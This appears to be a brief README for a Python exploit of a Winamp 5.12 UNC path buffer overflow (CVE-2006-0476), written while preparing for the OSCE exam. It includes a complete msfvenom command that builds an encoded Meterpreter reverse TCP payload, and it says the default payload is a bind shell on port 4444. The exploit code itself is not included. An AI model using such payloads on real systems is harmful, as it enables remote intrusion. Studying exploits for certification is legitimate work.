Winamp 5.12 UNC Path Buffer Overflow Exploit for Python
For preparing OSCE, I made a python script for CVE-2006-0476 exploit. You can create your own payload with eg
msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=4444 -a x86 --platform windows -f raw -e x86/alpha_mixed > payload
You need to create your own payload. Default one is bind shell at port 4444